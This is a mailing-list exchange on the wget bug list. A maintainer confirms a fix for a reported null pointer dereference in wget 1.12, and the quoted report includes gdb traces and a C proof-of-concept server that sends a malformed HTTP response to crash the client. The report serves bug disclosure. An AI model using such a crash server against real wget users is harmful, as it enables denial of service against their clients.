Re: [Bug-wget] wget bug report

[Giuseppe Scrivano]

Thanks for your report.  This bug is already fixed in the source
repository.

Cheers,
Giuseppe



Ildar Isaev <address@hidden> writes:

> Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2
>
> It turns out it has a null pointer dereference bug. This is how it may
> be reproduced.
>
> Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run:
>
> address@hidden:$ gcc -Wall expl_for_wget.c -o expl_for_wget
> address@hidden:$ ./expl_for_wget &
> [1] 7330
> address@hidden:$ gdb --args <path_to_wget_install_dir>/bin/wget
> http://127.0.0.1:3500/
> GNU gdb 6.8-debian
> Copyright (C) 2008 Free Software Foundation, Inc.
> License GPLv3+: GNU GPL version 3 or later
> <http://gnu.org/licenses/gpl.html>
> This is free software: you are free to change and redistribute it.
> There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
> and "show warranty" for details.
> This GDB was configured as "i486-linux-gnu"...
> (gdb) run
> [Thread debugging using libthread_db enabled]
> --2010-05-14 22:39:36--  http://127.0.0.1:3500/
> Connecting to 127.0.0.1:3500... connected.
> HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread 0x403a26c0 (LWP 7332)]
> 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> (gdb) bt
> #0  0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> #1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> #2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> #3  0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec,
> local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
>    iri=0x8a27d40) at http.c:2581
> #4  0x08072798 in retrieve_url (orig_parsed=0x8a280e8,
> origurl=0x8a27dd8 "http://127.0.0.1:3500/";, file=0xbffa8f2c,
>    newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false,
> iri=0x8a27d40, register_status=true) at retr.c:692
> #5  0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
> (gdb) up
> #1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> 117      return xmemdup (string, strlen (string) + 1);
> (gdb)
> #2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> 1832      hs->message = xstrdup (message);
> (gdb) list
> 1827      resp = resp_new (head);
> 1828   1829      /* Check for status line.  */
> 1830      message = NULL;
> 1831      statcode = resp_status (resp, &message);
> 1832      hs->message = xstrdup (message);
> 1833      if (!opt.server_response)
> 1834        logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
> 1835                   message ? quotearg_style (escape_quoting_style,
> message) : "");
> 1836      else
> (gdb) p message
> $1 = 0x0
>
> One can see that null pointer dereference occurs at http.c:1832 as
> message' is equal to null.
>
> Best regards,
> Ildar
>
> /* Server code in C */
> //exploit_13
>  
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>  
> int main(void)
> {
>   struct sockaddr_in stSockAddr;
>   int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
>
>   if(sfd == -1)
>   {
>     perror("can not create socket");
>     exit(EXIT_FAILURE);
>   }
>  
>   memset(&stSockAddr, 0, sizeof(struct sockaddr_in));
>  
>   stSockAddr.sin_family = AF_INET;
>   stSockAddr.sin_port = htons(3500);
>   inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr);
>
>   int bindRes = bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof(struct 
> sockaddr_in));
>  
>   if(bindRes == -1)
>   {
>     perror("error bind failed");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>
>   int listenRes = listen(sfd, 10);
>  
>   if(listenRes == -1)
>   {
>     perror("error listen failed");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>  
>   int cfd = accept(sfd, NULL, NULL);
>  
>   char buf[227] = 
> {0x48,0x54,0x54,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0A,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
>         
>   write(cfd, buf, 227);
>   close(cfd);
>  
>   return 0;
> }